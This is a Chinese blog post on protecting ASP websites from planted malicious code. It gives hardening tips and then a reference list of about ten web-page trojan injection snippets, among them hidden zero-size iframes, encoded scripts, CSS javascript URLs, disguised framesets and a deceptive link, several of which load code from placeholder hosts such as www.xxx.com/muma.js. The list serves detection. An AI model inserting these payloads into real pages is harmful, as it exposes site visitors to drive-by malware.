[原创]怎样让网站避免被挂马
1、建议通过FTP来上传和维护网页,尽量不安装ASP的上传程序。 2、对ASP上传程序的调用一定要进行身份认证,并设置只允许信任的人使用上传程序。 3、ASP程序管理员的用户名和密码不能是弱密码并且要定期更换。 4、到正规网站下载ASP程序,下载后修改数据库名称和存放路径,数据库的文件名称也要相对难些。 5、尽量保持程序是最新版本。 6、网页不加注后台管理程序登陆页面链接。 7、维护后删除后台管理程序的登陆页面,下次维护时再通过FTP上传。 8、要定期备份数据库等重要文件。 9、平时要多维护并注意空间中是否有来历不明的ASP文件。 10、发现被入侵时,除非能识别出所有木马文件,不然最好删除所有文件。 重新上传文件前,所有ASP程序用户名和密码都要重置,并且重新修改程序数据库名称和存放路径以及后台管理程序的路径。 做好防范措施网站就会相对比较安全,但也不能疏忽大意,因为入侵与反入侵是一场持久战。 挂马代码大全(检查文件是否被挂马时可参考) 一、框架挂马 <iframe src=地址 width=0 height=0></iframe> 二、JS文件挂马 首先将以下代码 document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三、JS变形加密 <script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后缀 四、Body挂马 <body ></body> 五、隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’; 六、CSS挂马 body { background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)} 七、JAJA挂马 <script language=javascript> window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″); </script> 八、图片伪装 <html> <iframe src=”网马地址” height=0 width=0></iframe> <img src=”图片地址”></center> </html> 九、伪装调用: <frameset rows=”444,0″ cols=”*”> <frame src=”打开网页” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″> <frame src=”网马地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″> </frameset> 十、高级欺骗 <a href=”http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)” > 页面要显示的内容 </a> <script Language=”Javascript”> function www_163_com () { var url=”网马地址”; open(url,”NewWindow”,”toolbar=no,location=no,directories=no, status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″); } </script>
|
|||
| >> 相关文章 | |||
浙公网安备 33048302000166号
